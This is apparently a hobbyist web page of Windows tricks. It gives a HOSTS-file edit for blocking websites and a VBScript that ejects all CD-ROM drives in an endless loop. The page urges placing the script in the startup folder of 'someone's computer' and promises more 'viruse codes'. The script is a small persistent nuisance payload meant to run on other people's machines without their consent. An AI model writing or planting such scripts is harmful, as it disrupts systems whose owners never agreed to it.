1)Ban Websites :
If you want to ban some websites do this ...
* Open the folder C:WINDOWSsystem32driversetc
* There you will find a file named HOSTS
* Click on the file and press SHIFT and now right click on it .
* From the right click menu select Open with .
* Now, select Notepad to open the file from the list !
* Now, in the file under the line 127.0.0.1 localhost add another line as 127.0.0.2 www.xyz.com.
* Now, File>>Save !
*************************************************************************
2)Open CD-Rom :
This will open the Cd-Rom again and again you close it...
Creat new txt file and written this code in it & save:
Code:
do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop
You can choose any name you like as long as it ends in .vbs
The ending of .vbs is essential.
You can put this .vbs file to startup in someone's computer and whach what will happen.....
*************************************************************************
Note: This page will frequently update......So regular visit to this page.Next viruse codes will be added 2 or 3 days later.